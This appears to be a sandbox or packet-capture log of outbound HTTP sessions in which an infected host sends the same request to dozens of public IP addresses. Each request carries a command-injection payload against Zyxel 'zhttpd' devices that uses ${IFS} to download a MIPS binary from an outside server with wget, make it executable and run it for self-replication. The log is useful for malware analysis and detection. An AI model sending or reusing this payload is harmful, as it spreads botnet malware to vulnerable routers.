                                      Jan 14, 2024 15:50:39.118035078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2395192.168.2.1444036119.192.208.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118071079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2396192.168.2.145779077.103.69.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118112087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2397192.168.2.1451402148.170.81.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118177891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2398192.168.2.145060071.208.41.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118176937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2399192.168.2.1434644165.101.125.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118195057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2400192.168.2.143525827.56.70.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118237019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2401192.168.2.144706240.49.84.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118277073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2402192.168.2.1458800219.118.229.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118310928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2403192.168.2.1451296116.2.32.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118347883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2404192.168.2.1441148169.86.218.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118371964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2405192.168.2.146087847.146.104.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118437052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2406192.168.2.1455156152.138.61.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118469000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2407192.168.2.1436634203.162.193.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118522882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2408192.168.2.143723262.164.88.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118552923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2409192.168.2.143821278.29.165.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118583918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2410192.168.2.1443298110.244.103.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118616104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2411192.168.2.144671681.31.12.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118648052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2412192.168.2.145800667.124.72.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118704081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2413192.168.2.144187840.91.229.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118737936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2414192.168.2.1452696159.116.191.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118786097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2415192.168.2.145434071.10.243.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118834972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2416192.168.2.143882274.88.172.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118868113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2417192.168.2.143686039.166.15.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118904114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2418192.168.2.143747434.36.55.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118936062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2419192.168.2.1433200130.170.36.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.118990898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2420192.168.2.143293251.117.63.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119045973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2421192.168.2.143455023.248.45.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119076967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2422192.168.2.145888247.236.157.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119115114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2423192.168.2.143800292.234.241.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119138002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2424192.168.2.144221464.219.131.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119174957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2425192.168.2.1446924200.233.191.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119219065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2426192.168.2.1434024209.108.204.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119247913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2427192.168.2.1458888126.181.157.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119292974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2428192.168.2.1451304111.34.170.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119328022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2429192.168.2.143545888.238.208.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119374990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2430192.168.2.1444040144.235.48.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119402885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2431192.168.2.145418853.27.130.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119436979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2432192.168.2.145171494.165.26.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119463921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2433192.168.2.1445822149.25.252.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119513988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2434192.168.2.1434112192.247.49.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119527102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2435192.168.2.145607039.174.22.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119590044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2436192.168.2.145847662.68.35.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119618893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2437192.168.2.146029280.56.84.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119647980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2438192.168.2.1433298202.234.147.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119678974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2439192.168.2.145773834.201.9.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119704008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2440192.168.2.1435548110.39.212.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119751930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2441192.168.2.1450932161.210.137.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119792938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2442192.168.2.145927042.155.104.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119832039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2443192.168.2.1446874195.112.65.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119887114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2444192.168.2.1453260153.8.230.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119918108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2445192.168.2.1436194108.119.53.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.119971991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2446192.168.2.143335439.135.140.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120009899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2447192.168.2.1437442182.233.168.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120038033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2448192.168.2.1451040213.206.118.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120085955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2449192.168.2.1438894168.243.34.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120115042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2450192.168.2.145080853.141.5.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120135069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2451192.168.2.1447818223.26.11.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120156050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2452192.168.2.144679265.47.56.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120213985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2453192.168.2.1434584170.39.102.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120239973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2454192.168.2.1438080178.124.37.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120282888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2455192.168.2.145792440.210.55.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120320082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2456192.168.2.1456692148.223.1.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.120368004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2457192.168.2.1444330158.200.222.94443
                                      TimestampBytes transferredDirectionData
